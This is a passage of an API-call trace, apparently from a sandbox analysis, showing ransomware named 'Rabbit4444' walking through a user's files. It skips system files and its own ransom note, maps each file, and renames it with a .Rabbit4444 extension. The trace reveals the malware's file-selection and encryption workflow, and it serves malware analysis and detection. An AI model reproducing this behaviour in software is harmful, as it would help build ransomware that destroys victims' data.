param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}.Rabbit4444") returned 156 [0068.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7ce59afd-be4e-4c4f-9d9c-1bfda6acea49}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7CE59AFD-BE4E-4C4F-9D9C-1BFDA6ACEA49}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7ce59afd-be4e-4c4f-9d9c-1bfda6acea49}.rabbit4444"), dwFlags=0x1) returned 1 [0068.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3806791c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3806791c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7D365946-8370-4038-8364-1D85D2D69BF5}", cAlternateFileName="{7D365~1")) returned 1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="Rabbit4444.exe") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2=".") returned 1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="..") returned 1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="windows") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="bootmgr") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="pagefile.sys") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="boot") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="ids.txt") returned -1 [0068.050] lstrcmpiW (lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}", lpString2="NTUSER.DAT") returned -1 [0068.050] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{7D365946-8370-4038-8364-1D85D2D69BF5}" | out: lpString1="{7D365946-8370-4038-8364-1D85D2D69BF5}") returned="{7D365946-8370-4038-8364-1D85D2D69BF5}" [0068.051] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7D365946-8370-4038-8364-1D85D2D69BF5}", dwFileAttributes=0x0) returned 1 [0068.051] lstrlenW (lpString="{7D365946-8370-4038-8364-1D85D2D69BF5}") returned 38 [0068.051] lstrlenW (lpString="Rabbit4444") returned 10 [0068.051] lstrcmpiW (lpString1="5D2D69BF5}", lpString2="Rabbit4444") returned -1 [0068.051] lstrlenW (lpString=".dll") returned 4 [0068.051] lstrcmpiW (lpString1="BF5}", lpString2=".dll") returned 1 [0068.051] lstrlenW (lpString=".lnk") returned 4 [0068.051] lstrcmpiW (lpString1="BF5}", lpString2=".lnk") returned 1 [0068.051] lstrlenW (lpString=".ini") returned 4 [0068.051] lstrcmpiW (lpString1="BF5}", lpString2=".ini") returned 1 [0068.051] lstrlenW (lpString=".sys") returned 4 [0068.051] lstrcmpiW (lpString1="BF5}", lpString2=".sys") returned 1 [0068.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7D365946-8370-4038-8364-1D85D2D69BF5}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7d365946-8370-4038-8364-1d85d2d69bf5}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.051] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.051] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15936215902) returned 1 [0068.051] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0068.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.052] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.053] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.054] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15936486708) returned 1 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0068.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.054] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.054] CloseHandle (hObject=0x29c) returned 1 [0068.054] CloseHandle (hObject=0x280) returned 1 [0068.054] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7D365946-8370-4038-8364-1D85D2D69BF5}.Rabbit4444") returned 156 [0068.055] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7D365946-8370-4038-8364-1D85D2D69BF5}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7d365946-8370-4038-8364-1d85d2d69bf5}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{7D365946-8370-4038-8364-1D85D2D69BF5}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{7d365946-8370-4038-8364-1d85d2d69bf5}.rabbit4444"), dwFlags=0x1) returned 1 [0068.055] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9230c6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a9230c6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", cAlternateFileName="{80325~1")) returned 1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="Rabbit4444.exe") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2=".") returned 1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="..") returned 1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="windows") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="bootmgr") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="pagefile.sys") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="boot") returned -1 [0068.055] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="ids.txt") returned -1 [0068.056] lstrcmpiW (lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}", lpString2="NTUSER.DAT") returned -1 [0068.056] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{803254EC-E5AF-441F-BA9E-59FEA741AF56}" | out: lpString1="{803254EC-E5AF-441F-BA9E-59FEA741AF56}") returned="{803254EC-E5AF-441F-BA9E-59FEA741AF56}" [0068.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{803254EC-E5AF-441F-BA9E-59FEA741AF56}", dwFileAttributes=0x0) returned 1 [0068.056] lstrlenW (lpString="{803254EC-E5AF-441F-BA9E-59FEA741AF56}") returned 38 [0068.056] lstrlenW (lpString="Rabbit4444") returned 10 [0068.056] lstrcmpiW (lpString1="EA741AF56}", lpString2="Rabbit4444") returned -1 [0068.056] lstrlenW (lpString=".dll") returned 4 [0068.056] lstrcmpiW (lpString1="F56}", lpString2=".dll") returned 1 [0068.056] lstrlenW (lpString=".lnk") returned 4 [0068.056] lstrcmpiW (lpString1="F56}", lpString2=".lnk") returned 1 [0068.056] lstrlenW (lpString=".ini") returned 4 [0068.056] lstrcmpiW (lpString1="F56}", lpString2=".ini") returned 1 [0068.056] lstrlenW (lpString=".sys") returned 4 [0068.056] lstrcmpiW (lpString1="F56}", lpString2=".sys") returned 1 [0068.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{803254EC-E5AF-441F-BA9E-59FEA741AF56}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{803254ec-e5af-441f-ba9e-59fea741af56}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.056] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.056] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15936793169) returned 1 [0068.058] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0068.058] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.061] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.063] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15937367591) returned 1 [0068.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0068.063] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.063] CloseHandle (hObject=0x29c) returned 1 [0068.063] CloseHandle (hObject=0x280) returned 1 [0068.063] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{803254EC-E5AF-441F-BA9E-59FEA741AF56}.Rabbit4444") returned 156 [0068.063] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{803254EC-E5AF-441F-BA9E-59FEA741AF56}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{803254ec-e5af-441f-ba9e-59fea741af56}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{803254EC-E5AF-441F-BA9E-59FEA741AF56}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{803254ec-e5af-441f-ba9e-59fea741af56}.rabbit4444"), dwFlags=0x1) returned 1 [0068.064] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa2e131, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9aa2e131, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", cAlternateFileName="{8062D~1")) returned 1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="Rabbit4444.exe") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2=".") returned 1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="..") returned 1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="windows") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="bootmgr") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="pagefile.sys") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="boot") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="ids.txt") returned -1 [0068.064] lstrcmpiW (lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}", lpString2="NTUSER.DAT") returned -1 [0068.064] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8062D437-AF97-40EE-8A69-2AE530BD9C47}" | out: lpString1="{8062D437-AF97-40EE-8A69-2AE530BD9C47}") returned="{8062D437-AF97-40EE-8A69-2AE530BD9C47}" [0068.064] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8062D437-AF97-40EE-8A69-2AE530BD9C47}", dwFileAttributes=0x0) returned 1 [0068.065] lstrlenW (lpString="{8062D437-AF97-40EE-8A69-2AE530BD9C47}") returned 38 [0068.065] lstrlenW (lpString="Rabbit4444") returned 10 [0068.065] lstrcmpiW (lpString1="530BD9C47}", lpString2="Rabbit4444") returned -1 [0068.065] lstrlenW (lpString=".dll") returned 4 [0068.065] lstrcmpiW (lpString1="C47}", lpString2=".dll") returned 1 [0068.065] lstrlenW (lpString=".lnk") returned 4 [0068.065] lstrcmpiW (lpString1="C47}", lpString2=".lnk") returned 1 [0068.065] lstrlenW (lpString=".ini") returned 4 [0068.065] lstrcmpiW (lpString1="C47}", lpString2=".ini") returned 1 [0068.065] lstrlenW (lpString=".sys") returned 4 [0068.065] lstrcmpiW (lpString1="C47}", lpString2=".sys") returned 1 [0068.065] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8062D437-AF97-40EE-8A69-2AE530BD9C47}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8062d437-af97-40ee-8a69-2ae530bd9c47}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.065] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.065] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15937619830) returned 1 [0068.065] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0068.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0068.066] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.067] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.068] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15937871851) returned 1 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0068.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0068.068] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.068] CloseHandle (hObject=0x29c) returned 1 [0068.068] CloseHandle (hObject=0x280) returned 1 [0068.068] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8062D437-AF97-40EE-8A69-2AE530BD9C47}.Rabbit4444") returned 156 [0068.068] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8062D437-AF97-40EE-8A69-2AE530BD9C47}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8062d437-af97-40ee-8a69-2ae530bd9c47}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8062D437-AF97-40EE-8A69-2AE530BD9C47}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8062d437-af97-40ee-8a69-2ae530bd9c47}.rabbit4444"), dwFlags=0x1) returned 1 [0068.069] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bb77277, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bb77277, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", cAlternateFileName="{8428D~1")) returned 1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="Rabbit4444.exe") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2=".") returned 1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="..") returned 1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="windows") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="bootmgr") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="pagefile.sys") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="boot") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="ids.txt") returned -1 [0068.069] lstrcmpiW (lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}", lpString2="NTUSER.DAT") returned -1 [0068.069] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8428D171-5820-4E58-8DDB-7ED13951D0DF}" | out: lpString1="{8428D171-5820-4E58-8DDB-7ED13951D0DF}") returned="{8428D171-5820-4E58-8DDB-7ED13951D0DF}" [0068.069] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8428D171-5820-4E58-8DDB-7ED13951D0DF}", dwFileAttributes=0x0) returned 1 [0068.070] lstrlenW (lpString="{8428D171-5820-4E58-8DDB-7ED13951D0DF}") returned 38 [0068.070] lstrlenW (lpString="Rabbit4444") returned 10 [0068.070] lstrcmpiW (lpString1="13951D0DF}", lpString2="Rabbit4444") returned -1 [0068.070] lstrlenW (lpString=".dll") returned 4 [0068.070] lstrcmpiW (lpString1="0DF}", lpString2=".dll") returned 1 [0068.070] lstrlenW (lpString=".lnk") returned 4 [0068.070] lstrcmpiW (lpString1="0DF}", lpString2=".lnk") returned 1 [0068.070] lstrlenW (lpString=".ini") returned 4 [0068.070] lstrcmpiW (lpString1="0DF}", lpString2=".ini") returned 1 [0068.070] lstrlenW (lpString=".sys") returned 4 [0068.070] lstrcmpiW (lpString1="0DF}", lpString2=".sys") returned 1 [0068.070] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8428D171-5820-4E58-8DDB-7ED13951D0DF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8428d171-5820-4e58-8ddb-7ed13951d0df}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.071] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.071] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15938161542) returned 1 [0068.071] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0068.071] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.071] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.072] MapViewOfFile (hFileMappingObject=0x29c, 